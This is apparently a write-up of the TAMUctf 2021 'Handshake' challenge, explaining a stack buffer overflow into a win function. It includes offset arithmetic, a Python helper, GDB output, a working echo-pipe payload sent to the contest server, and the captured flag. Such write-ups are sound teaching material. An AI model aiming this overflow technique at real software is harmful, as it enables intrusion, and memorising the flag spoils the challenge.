TAMUctf 2021 Handshake Solution
TAMUctf 2021 Handshake - 150 points
Attack this binary and get the flag! handshake
openssl s_client -connect tamuctf.com:443 -servername handshake -quiet
Handshake is a standard i686 Linux binary with NX but no PIE. There's a stack buffer overflow which is easy enough to exploit. Without PIE, ROP is available, but because Handshake provides a win function, the sensible route is to return straight into it rather than build a full ROP chain for arbitrary code execution.
I used GDB to find the correct offset; otherwise I could have exploited the binary straight away without using GDB at all. The problem I had finding the right amount of padding was that I couldn't quite count the stack size. Let's do it now.
80492cb: PUSH EBP
80492cc: MOV EBP, ESP ; EBP = ESP;
80492ce: PUSH EBX
80492cf: SUB ESP, 0x24 ; ESP -= 0x24;
4 bytes for PUSH EBP. 4 bytes for PUSH EBX. 0x24 bytes for SUB ESP, 0x24. How many is that? 0x2c, i.e. 44 bytes from the bottom of the frame to the saved return address. So we need 44 bytes of padding before the address of the win function. That's it. That's the whole thing.
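To make that count reproducible, here is an added example (not from the original writeup) that parses the prologue lines above and reports which frame slot a word lands in for a given amount of filler. It assumes the overflowed buffer starts at the lowest address of the frame (ESP right after the SUB), which is what the 44-byte result implies.

```python
import re

# Prologue of vuln() as shown in the writeup (copied here as constructed input).
VULN_PROLOGUE = """
80492cb: PUSH EBP
80492cc: MOV EBP, ESP ; EBP = ESP;
80492ce: PUSH EBX
80492cf: SUB ESP, 0x24 ; ESP -= 0x24;
"""

PUSH_RE = re.compile(r"\bPUSH\s+(\w+)", re.IGNORECASE)
SUB_ESP_RE = re.compile(r"\bSUB\s+ESP\s*,\s*(0x[0-9a-fA-F]+|\d+)", re.IGNORECASE)

def frame_layout(prologue, word=4):
    """Return (offset_from_frame_bottom, size, name) slots for an i686 frame.
    Assumption: the overflowed buffer begins at the lowest address of the
    frame, so offset 0 is the first byte the vulnerable read overwrites."""
    pushed, local_bytes = [], 0
    for line in prologue.strip().splitlines():
        text = line.split(":", 1)[1] if ":" in line else line  # drop the address
        text = text.split(";", 1)[0]                            # drop any comment
        if m := PUSH_RE.search(text):
            pushed.append(m.group(1).upper())
        elif m := SUB_ESP_RE.search(text):
            local_bytes += int(m.group(1), 0)
    slots = [(0, local_bytes, "locals/buffer")]
    off = local_bytes
    for reg in reversed(pushed):   # the last register pushed sits just above the locals
        slots.append((off, word, "saved " + reg))
        off += word
    slots.append((off, word, "return address"))
    return slots

def slot_at(slots, padding):
    """Name the slot that a 4-byte value written after `padding` filler bytes lands in."""
    for start, size, name in slots:
        if start <= padding < start + size:
            return name
    return "beyond the frame"

def return_offset(slots):
    """Filler needed to reach the saved return address."""
    return next(start for start, _, name in slots if name == "return address")

if __name__ == "__main__":
    layout = frame_layout(VULN_PROLOGUE)
    for start, size, name in layout:
        print(f"offset {start:3d} ({size:2d} bytes): {name}")
    print("padding to return address:", return_offset(layout))  # 44
```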
(gdb) run <hs_a.txt
Starting program: /home/angr/handshake <hs_a.txt
Whats the secret handshake?
That isn't correct! You aren't supposed to be here.
Program received signal SIGSEGV, Segmentation fault.
0x0804a020 in ?? ()
...
(gdb) b *0x804931d
Breakpoint 1 at 0x804931d
(gdb) run
Starting program: /home/angr/handshake <hs_a.txt
Whats the secret handshake?
...
Breakpoint 1, 0x0804931d in vuln ()
(gdb) si
0x08049333 in main ()
(gdb) i r esp
esp 0xffffd5a0 0xffffd5a0
(gdb) x/10wx $esp
0xffffd5a0: 0x00000001 0x080490b0 0x00000000 0xf7dc1905
0xffffd5b0: 0x00000001 0xffffd654 0xffffd65c 0xffffd5e4
0xffffd5c0: 0xffffd5f4 0xf7ffdb78
(gdb) x/10wx $esp-4
0xffffd59c: 0x08049333 0x00000001 0x080490b0 0x00000000
0xffffd5ac: 0xf7dc1905 0x00000001 0xffffd654 0xffffd65c
0xffffd5bc: 0xffffd5e4 0xffffd5f4
(gdb) x/10wx $esp-8
0xffffd598: 0xffffd500 0x08049333 0x00000001 0x080490b0
0xffffd5a8: 0x00000000 0xf7dc1905 0x00000001 0xffffd654
0xffffd5b8: 0xffffd65c 0xffffd5e4
(gdb) x/10wx $esp-12
0xffffd594: 0x080491c2 0xffffd500 0x08049333 0x00000001
0xffffd5a4: 0x080490b0 0x00000000 0xf7dc1905 0x00000001
0xffffd5b4: 0xffffd654 0xffffd65c
(gdb) x/10wx $esp-16
0xffffd590: 0x41414141 0x080491c2 0xffffd500 0x08049333
0xffffd5a0: 0x00000001 0x080490b0 0x00000000 0xf7dc1905
0xffffd5b0: 0x00000001 0xffffd654

This run (hs_a.txt) shows the overwrite falling short: after vuln returned, $esp-4 (0xffffd59c) still holds the return into main, 0x08049333, while the win address 0x080491c2 sits at $esp-12, the saved EBX slot, just above the 0x41414141 filler. The address landed two words below the return address, which is exactly the count the prologue arithmetic above fixes.
echo -e 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\xc2\x91\x04\x08' |./handshake
Whats the secret handshake?
Correct! this is a flag and stuff =]
Segmentation fault
(echo -e 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\xc2\x91\x04\x08'; cat) |openssl s_client -connect tamuctf.com:443 -servername handshake -quiet
depth=0 CN = hulkcybr1
verify error:num=18:self signed certificate
verify return:1
depth=0 CN = hulkcybr1
verify return:1
Whats the secret handshake?
Correct! gigem{r37urn_c0n7r0l1337}
The flag is gigem{r37urn_c0n7r0l1337}